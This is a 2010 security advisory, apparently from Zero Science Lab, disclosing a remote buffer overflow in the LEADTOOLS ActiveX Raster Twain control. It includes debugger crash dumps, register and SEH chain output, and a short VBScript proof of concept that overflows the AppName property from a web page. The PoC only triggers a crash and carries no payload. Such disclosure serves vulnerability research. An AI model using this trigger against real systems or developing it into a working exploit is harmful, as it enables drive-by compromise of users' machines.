扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 |
LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC Vendor: LEAD Technologies, Inc. Product Web Page: http://www.leadtools.com Affected Version: 16.5.0.2 Summary: With LEADTOOLS you can control any scanner, digital camera or capture card that has a TWAIN (32 and 64 bit) device driver. High-level acquisition support is included for ease of use while low-level functionality is provided for flexibility and control in even the most demanding scanning applications. Desc: The Raster Twain Object Library suffers from a buffer overflow vulnerability because it fails to check the boundry of the user input. Tested On: Microsoft Windows XP Professional SP3 (EN) Windows Internet Explorer 8.0.6001.18702 RFgen Mobile Development Studio 4.0.0.06 (Enterprise) =============================================================== (2c4.2624): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000 eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0 nv up ei pl nz na pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010206 ntdll!wcscpy+0xe: 7c912f4e 668901mov word ptr [ecx],axds:0023:01649000=???? 0:000> g (2c4.2624): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041 eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0 nv up ei pl nz na pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010206 ntdll!RtlpNtMakeTemporaryKey+0x6a74: 7c96c540 807b07ffcmp byte ptr [ebx+7],0FFhds:0023:00410040=?? ================================================================== Registers: -------------------------------------------------- EIP 7C912F4E EAX 00130041 EBX 100255BC -> 10014840 -> Asc: @H@H ECX 01649000 EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EDI 00000000 ESI 0013EF6C -> BAAD0008 EBP 0013EDA8 -> 0013EDDC ESP 0013EDA8 -> 0013EDDC -- EIP 7C96C540 EAX 00410039 EBX 00410039 ECX 00150000 -> 000000C8 EDX 00150608 -> 7C97B5A0 EDI 00410041 ESI 00150000 -> 000000C8 EBP 0013F228 -> 0013F278 ESP 0013F220 -> 00150000 ArgDump: -------------------------------------------------- EBP+8 016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+12 0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+16 00000000 EBP+20 0013EF6C -> BAAD0008 EBP+24 100255BC -> 10014840 -> Asc: @H@H EBP+28 0013EDB8 -> 00000000 -- EBP+8 00150000 -> 000000C8 EBP+12 00410039 EBP+16 7C96DBA4 -> Asc: RtlGetUserInfoHeap EBP+20 00000000 EBP+24 00410041 EBP+28 7C80FF12 -> 9868146A CompanyName LEAD Technologies, Inc. FileDescription LEADTOOLS ActiveX Raster Twain (Win32) FileVersion 16,5,0,2 InternalName LTRTNU LegalCopyright © 1991-2009 LEAD Technologies, Inc. OriginalFileName LTRTNU.DLL ProductName LEADTOOLS® for Win32 ProductVersion 16.5.0.0 Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F} RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: False Exception Code: ACCESS_VIOLATION Disasm: 7C912F4E MOV [ECX],AX (ntdll.dll) Disasm: 7C96C540 CMP BYTE PTR [EBX+7],FF (ntdll.dll) Exception Code: BREAKPOINT Disasm: 7C90120E INT3 (ntdll.dll) Seh Chain: -------------------------------------------------- 1 7C839AC0 KERNEL32.dll 2 FC2950 VBSCRIPT.dll 3 7C90E900 ntdll.dll 7C912F4E MOV [ECX],AX <--- CRASH 7C96C540 CMP BYTE PTR [EBX+7],FF <--- CRASH 7C90120F RETN <--- CRASH ================================================================== Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - http://www.zeroscience.mk 24.08.2010 Zero Science Lab Advisory ID: ZSL-2010-4960 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php PoC: <object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll" prototype= "Property Let AppName As String" memberName = "AppName" progid = "LTRASTERTWAINLib_U.LEADRasterTwain_U" argCount = 1 arg1=String(9236, "A") target.AppName = arg1 </script> |
体验盒子
